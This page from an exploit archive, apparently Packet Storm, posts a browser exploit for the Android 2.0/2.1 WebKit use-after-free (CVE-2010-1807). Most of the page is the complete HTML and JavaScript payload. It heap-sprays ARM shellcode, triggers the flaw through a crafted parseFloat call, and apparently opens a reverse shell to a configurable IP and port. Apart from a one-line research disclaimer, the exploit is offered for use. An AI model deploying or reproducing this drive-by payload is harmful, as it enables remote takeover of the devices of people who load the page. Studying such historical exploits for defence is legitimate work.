Exploit the possiblities

Android 2.0 / 2.1 Use-After-Free Remote Code Execution

Android 2.0 / 2.1 Use-After-Free Remote Code Execution
Posted Nov 16, 2010
Authored by Itzhak Avraham, mj

Android versions 2.0 and 2.1 use-after-free remote code execution on webkit exploit.

tags | exploit, remote, code execution
advisories | CVE-2010-1807
MD5 | 7b90bebf767fe960f4b6a8e961d30488

Android 2.0 / 2.1 Use-After-Free Remote Code Execution

Change Mirror Download
# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807


*Better exploit (better rate and more flexible for changes, also shorter
shellcode) than what you have, plus, it's also verified. Enjoy!
More details at : *
http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html*


<html>
<head>
<script>
//This code is only for security researches/teaching purposes,use at your own risk!

// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched= android 2.2, some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com

var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))
//var ip = e.g: unescape("\u000a\u0202"); //ip = 10.0.2.2

function trigger()
{
var span = document.createElement("div");
document.getElementById("BodyID").appendChild(span);
span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //trigger use-after-free
}
function exploit()
{
var nop = unescape("\u33bc\u0057"); //LDREQH R3,[R7],-0x3C for nopping
do
{
nop+=nop;
} while (nop.length<=0x1000);
var scode = nop+unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
scode += port;
scode += ip;
scode += unescape("\u2000\u2000");
target = new Array();
for(i = 0; i < 0x1000; i++)
target[i] = scode;
for (i = 0; i <= 0x1000; i++)
{
document.write(target[i]+"<i>");
if (i>0x999)
{
trigger();
}
}
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
exploit();
</script>
</body>
</html>

Twitter account : @ihackbanme


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

February 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    15 Files
  • 2
    Feb 2nd
    15 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    13 Files
  • 5
    Feb 5th
    16 Files
  • 6
    Feb 6th
    15 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    15 Files
  • 9
    Feb 9th
    18 Files
  • 10
    Feb 10th
    8 Files
  • 11
    Feb 11th
    8 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    15 Files
  • 14
    Feb 14th
    15 Files
  • 15
    Feb 15th
    17 Files
  • 16
    Feb 16th
    18 Files
  • 17
    Feb 17th
    37 Files
  • 18
    Feb 18th
    2 Files
  • 19
    Feb 19th
    16 Files
  • 20
    Feb 20th
    16 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    16 Files
  • 23
    Feb 23rd
    31 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close